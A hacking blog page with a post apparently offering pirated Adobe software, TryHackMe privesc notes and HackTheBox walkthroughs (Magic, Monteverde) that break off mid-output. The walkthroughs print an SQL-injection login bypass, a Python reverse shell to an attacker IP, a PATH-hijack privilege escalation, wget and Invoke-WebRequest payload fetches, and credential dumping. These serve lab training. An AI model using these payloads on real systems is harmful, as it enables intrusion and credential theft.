IT VN

Information Technology | Softwares - Graphics - Programming - Hacking - Security

Laladee

We Provide Knowledge About Information Technology.

Laladee

About Programs And Software Computer.

Laladee

Hacking And Security.

Laladee

And Computer Graphic Design.

Laladee

World is Open Source. Type cat vmlinuz > /dev/audio to hear the Voice of God !!

Jul 19, 2020

Download Full Adobe Creative Cloud Suite 2020 Full New Update | Free Download

, , , , , ,



Application Icon


File Icon






Folder Icon






Some Splash Screen






Download Adobe After Effects 2020


Download Adobe Animate 2020


Download Adobe Character Animator 2020


Download Adobe Dimension 2020


Download Adobe Illustrator 2020


Download Adobe InDesign 2020


Download Adobe Photoshop Lightroom Classic 2020


Download Adobe Media Encoder 2020


Download Adobe Photoshop 2020


Download Adobe Premiere Pro 2020


Download Adobe XD 2020
Just Install then Enjoy!



Share:
Read More

Jun 29, 2020

TryHackMe - Linux PrivEsc Arena

,

Link room: https://tryhackme.com/room/linuxprivescarena
This room very basic about PrivEsc in linux. All most task is show the ways to get root shell by tutorial very detailed. I has note some task to complete this room, maybe helpful

Task 2
Login as TCM with SSH: ssh TCM@<machine ip>
password: Hacker123

 Task 4
Read credentials file: cat /etc/openvpn/auth.txt
We will see password321 as password and user as username

 Task 5
#1: TCM trying to log into mysql
#2: TCM trying to log in as root
#3: Password: password123

 Task 6
Run "ls -al /etc/" and -rw-rw-r-- is permissions of shadow file

 Task 7
Run "find / -name id_rsa 2> /dev/null" We will get the path of id_rsa file: /backups/supersecretkeys/id_rsa
Read and save it with name id_rsa, run "chmod 400 id_rsa" to set mode permissions and we can login as root by ssh without password: ssh -i id_rsa root@<machine ip>

 Task 12
Run "dpkg -l | grep nginx"
We see the version of nginx is 1.6.2-5, This version has a vulnerability allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log
#1 Answer: CVE-2016-1247
We can see the PoC in /home/user/tools/nginx/nginxed-root.sh file or exploit code at link:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

 BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

 #2: It show SUIDBIN="/usr/bin/sudo". so sudo is SUID enabled and assists in the attack
Wonderful knowledge for beginners, thanks to TCM
Share:
Read More

May 1, 2020

HackTheBox Machine Write-up | Magic Walkthrough

, ,
For write-up of the Active machine, you need root flag as password to read.
Starting from Traceback machine, the flag is dynamic so writeup will public when the machine is retired.
┌─[laladee@parrot]─[~]
└──╼ $nmap -A  10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 14:30 BST
Nmap scan report for 10.10.10.185
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.91 seconds

open web host. and try login with sqli
    http://10.10.10.185/login.php
    username: admin
    password: 'or'x'='x
I login successful, then we can upload image file
After few mins, I uploaded shell successfully (it has often been deleted)

passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false

Go around and I found credentials of user named "theseus" in ../../db.php5
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}
</pre>

I tried login with theseus, and ssh but both fail. After trying some ways and got some hints...
I can see machine using mysql service from passwd file, so I checked database and dump it out

www-data@ubuntu:mysqldump -utheseus -piamkingtheseus Magic
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-29  8:52:28

so I got a new credential: 'admin','Th3s3usW4sK1ng'
I tried switch user to admin but there show nothing, tried around then I can access user "theseus" and admin's pass

www-data@ubuntu: cd /
www-data@ubuntu:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")' 
www-data@ubuntu:/$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$ ls 
ls
Desktop    Downloads  Pictures Templates  Videos
Documents  Music      Public user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
d7f59901cf48e90bc3d4ead758b82f48


Getting root
theseus@ubuntu:~$ find / -perm -4000 -ls 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
  1052353    376 -rwsr-xr--   1 root     dip        382696 Feb 11 07:05 /usr/sbin/pppd
   924805     40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /usr/bin/newgrp
   924863     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
   924178     76 -rwsr-xr-x   1 root     root        76496 Mar 22  2019 /usr/bin/chfn
   924437     76 -rwsr-xr-x   1 root     root        75824 Mar 22  2019 /usr/bin/gpasswd
   923568    148 -rwsr-xr-x   1 root     root       149080 Jan 31 09:18 /usr/bin/sudo
   924969     24 -rwsr-xr-x   1 root     root        22520 Mar 27  2019 /usr/bin/pkexec
   924180     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /usr/bin/chsh
   925362     20 -rwsr-xr-x   1 root     root        18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   924102     24 -rwsr-xr-x   1 root     root        22528 Jun 28  2019 /usr/bin/arping
   917602     12 -rwsr-xr-x   1 root     root        10312 Dec  9 02:03 /usr/bin/vmware-user-suid-wrapper
  1185246    428 -rwsr-xr-x   1 root     root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
  1180509     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1185286     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
  1180812     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
  1195335     12 -rwsr-sr-x   1 root     root          10232 Dec 18 00:15 /usr/lib/xorg/Xorg.wrap
  1189577    108 -rwsr-sr-x   1 root     root         109432 Oct 30  2019 /usr/lib/snapd/snap-confine
       55     43 -rwsr-xr-x   1 root     root          43088 Aug 22  2019 /snap/core18/1223/bin/mount
       64     63 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /snap/core18/1223/bin/ping
       80     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /snap/core18/1223/bin/su
       98     27 -rwsr-xr-x   1 root     root          26696 Aug 22  2019 /snap/core18/1223/bin/umount
     1730     75 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /snap/core18/1223/usr/bin/chfn
     1732     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /snap/core18/1223/usr/bin/chsh
     1782     75 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /snap/core18/1223/usr/bin/gpasswd
     1846     40 -rwsr-xr-x   1 root     root          40344 Mar 22  2019 /snap/core18/1223/usr/bin/newgrp
     1858     59 -rwsr-xr-x   1 root     root          59640 Mar 22  2019 /snap/core18/1223/usr/bin/passwd
     1949    146 -rwsr-xr-x   1 root     root         149080 Jan 17  2018 /snap/core18/1223/usr/bin/sudo
     2036     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2344    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1223/usr/lib/openssh/ssh-keysign
       55     43 -rwsr-xr-x   1 root     root               43088 Aug 22  2019 /snap/core18/1668/bin/mount
       64     63 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /snap/core18/1668/bin/ping
       80     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /snap/core18/1668/bin/su
       98     27 -rwsr-xr-x   1 root     root               26696 Aug 22  2019 /snap/core18/1668/bin/umount
     1730     75 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /snap/core18/1668/usr/bin/chfn
     1732     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /snap/core18/1668/usr/bin/chsh
     1782     75 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /snap/core18/1668/usr/bin/gpasswd
     1846     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /snap/core18/1668/usr/bin/newgrp
     1858     59 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /snap/core18/1668/usr/bin/passwd
     1949    146 -rwsr-xr-x   1 root     root              149080 Oct 10  2019 /snap/core18/1668/usr/bin/sudo
     2036     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2344    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1668/usr/lib/openssh/ssh-keysign
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27 06:28 /snap/core/8689/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/8689/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/8689/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/8689/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27 06:28 /snap/core/8689/bin/umount
     2666     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/8689/usr/bin/chfn
     2668     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/8689/usr/bin/chsh
     2744     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/8689/usr/bin/gpasswd
     2836     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/8689/usr/bin/newgrp
     2849     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/8689/usr/bin/passwd
     2959    134 -rwsr-xr-x   1 root     root              136808 Jan 31 10:37 /snap/core/8689/usr/bin/sudo
     3058     42 -rwsr-xr--   1 root     systemd-resolve    42992 Nov 29 04:40 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3428    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/8689/usr/lib/openssh/ssh-keysign
     6466    105 -rwsr-sr-x   1 root     root              106696 Feb 12 08:34 /snap/core/8689/usr/lib/snapd/snap-confine
     7640    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/8689/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Aug 23  2019 /snap/core/7917/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/7917/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/7917/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/7917/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Aug 23  2019 /snap/core/7917/bin/umount
     2657     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/7917/usr/bin/chfn
     2659     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/7917/usr/bin/chsh
     2735     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/7917/usr/bin/gpasswd
     2827     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/7917/usr/bin/newgrp
     2840     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
     2950    134 -rwsr-xr-x   1 root     root              136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
     3049     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3419    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
     6454    105 -rwsr-sr-x   1 root     root              106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
     7628    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
   131127     28 -rwsr-xr-x   1 root     root               26696 Jan  8 10:31 /bin/umount
   131130     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   393232     24 -rwsr-x---   1 root     users              22040 Oct 21  2019 /bin/sysinfo
   131123     44 -rwsr-xr-x   1 root     root               43088 Jan  8 10:31 /bin/mount
   131231     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
   131203     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping

I noticed that /bin/sysinfo can execute as root and users
After some hints. I got this: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
Read /bin/sysinfo, I can see the sysinfo run a command "fdisk -l" - our target

machine use python3, so I made a reverse shell named "fdisk" in my attack machine:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.81",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

create host
┌─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...
10.10.10.185 - - [30/Apr/2020 16:37:48] "GET /fdisk HTTP/1.1" 200 -

theseus@ubuntu:/tmp$ wget http://10.10.14.81:1337/fdisk
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/sbin/fdisk
theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/sbin/fdisk
theseus@ubuntu:/tmp$ chmod 755 fdisk
chmod 755 fdisk
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/tmp/fdisk

listen....
┌─[✗]─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...

theseus@ubuntu:/tmp$ sysinfo
then we got root!!

┌─[✗]─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.81] from (UNKNOWN) [10.10.10.185] 45426
root@ubuntu:/tmp# id   
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@ubuntu:/tmp# cd 
cd 
root@ubuntu:~# cd /root
cd /root
root@ubuntu:/root# cat root.txt
cat root.txt
b3fc3d1750e33cfe35a3ad9c37273956
root@ubuntu:/root# exit
exit

Share:
Read More

Apr 20, 2020

HackTheBox Machine Write-up | Monteverde Walkthrough

, ,
┌─[laladee@parrot]─[~/Downloads]
└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
|_clock-skew: -47m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-20T03:57:38
|_  start_date: N/A

 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds

After enum, we have couple usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan

I tried some ways to login, and I were able to access SMB of SABatchJobs with password as username


┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password: 

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
azure_uploads   Disk      
C$              Disk      Default share
E$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
users$          Disk      
SMB1 disabled -- no workgroup available

We can see user can has access to "user$" directory

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
  .                                   D        0  Fri Jan  3 13:12:30 2020
  ..                                  D        0  Fri Jan  3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
  mhope                               D        0  Fri Jan  3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file.  See it anyway? 
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+  Stopped                 smbclient //10.10.10.172/users$ -U SABatchJobs


azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

Ok now we have password of user "mhope"

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents> 


GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\> 

After few mins google search about MEGABANK\Azure Admins 
I found vulnerability: https://blog.xpnsec.com/azuread-connect-for-redteam/


┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
